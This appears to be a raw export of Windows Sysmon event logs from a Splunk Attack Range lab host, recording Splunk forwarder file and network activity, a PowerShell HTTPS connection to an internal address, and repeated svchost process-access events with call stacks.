Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EDE6195B70893069B821C9261C38522B,SHA256=690BB833C9522A856F054480C152B0F86B60F58DF071B7AB4CB502E313D55366,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:37.297{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62110-false10.0.1.12-8000- 23542300x800000000000000035128102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:14.990{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDE39B0222AFD7B80513D6F970540A17,SHA256=300757AEC741A775CA97BD2BD60C42E41B25CB45D4DB8CFBA41ECF5D77FFDBE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:38.559{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62111-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:16.005{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3313C5A903D6244A6C36A1EE20CF0729,SHA256=1EEC6B4823E0444B393321651D3D23AB652868AC89770714C7E6C6E5F5D410A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:17.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A72787495C8C99CE2B05E4078E8D9DA7,SHA256=3DD309461401DADB84E10C5BDD356071BF9B3810DC0C68D323130AC0986EFC17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:42.355{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62112-false10.0.1.12-8000- 23542300x800000000000000035128105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:18.120{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD417019D6BE829B49F581F7B58BC77A,SHA256=EC71FA0B07A9F673729548794FEDD34B7E5C4A8FDCF6E61E260AA78ADD34AEBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=24AC9175BF78DFE74D2E8FD8FB9FEF4F,SHA256=1E0AD02D1A2AF9008E430BFA22847C208E80C966B211568C2112F9DE3C77043C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:19.204{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 